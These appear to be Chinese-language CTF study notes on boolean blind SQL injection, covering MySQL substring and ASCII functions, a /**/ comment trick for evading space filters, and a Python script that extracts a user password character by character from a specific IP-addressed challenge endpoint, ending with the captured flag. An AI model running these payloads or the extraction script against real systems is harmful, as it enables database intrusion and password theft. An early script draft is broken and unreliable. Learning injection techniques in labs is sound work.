bool型盲注

• if(xxxx,1,0)
• substring('xxxx' from 1 for 1)
  • select substr('abc' from 1 for 1)
  • 从 abc的第一位取一位
• mid('abc' , 1 ,1 ) = mid('abc' from 1 for 1)
• left(str,length)从左边开始截取字符串

转ASCII类型

•  ascii(substr('xxx',1,1))=97
•  ord() //返回第一个字符的ascii

userid=ascii((substr(select password from user) from 1 for 1))=127

过滤空格时的逃逸方法：利用内敛注释符/**/

improt requests

discts = 'abcdefghijklmnopqrstuvwxyz0123456789'

flag = ''

for x in xrange(1,50)

 for x in dicts:

  url = '   '

   try:

       response = request.get(url.timeout =5)

       if response.content.find('error password'):

        pass

bool型盲注：

截取函数
mid()函数

mid(column_name,start[,length])

column_name:必需，要提取字符的字段
start:必需，规定开始位置（起始值是1）。
length:可选，要返回的字符数。如果省略，则MID()函数返回剩余文本。

select mid('abcde' from 3 for 1);

select mid('abcde',1,1)

left(str,length)从左开始截取字符串

说明：left(被截取字段，截取长度)

right(str,length) 从右开始截取字符串

说明：right(被截取字段，截取长度)

select left('abcde',1)

ascii()函数  //返回ascii值
ord()函数   //返回ascii值

106.12.37.37:8080/level2

(ascii(substr((select/**/password/**/from/**/user)/**/from/**/1/**/for/**/1))<127)

1.py:

import requests

dicts='abcdefghijklmnopqrstuvwxyz0123456789'

flag=''

for x in xrange(1,50):

  for i in dicts:

    url='http://106.12.37.37:8080/level2/index.php?token=21232f297a57a5a743894a0e4a801fc3&userid=(ascii(substr((select/**/password/**/from/**/user)/**/from/**/%d/**/for/**/1))=%d)&password=1' %(x,ord(i))

    try:

      response=requests.get(url,timeout=5)

      if response.content.find('error password!') != -1:

        flag=flag+i

        print flag

        break

    except Exception,e:

      pass

print flag

219d03ad2d752ad2806ea1de18613158

flag{b75079652c058c54f066e158727cd494}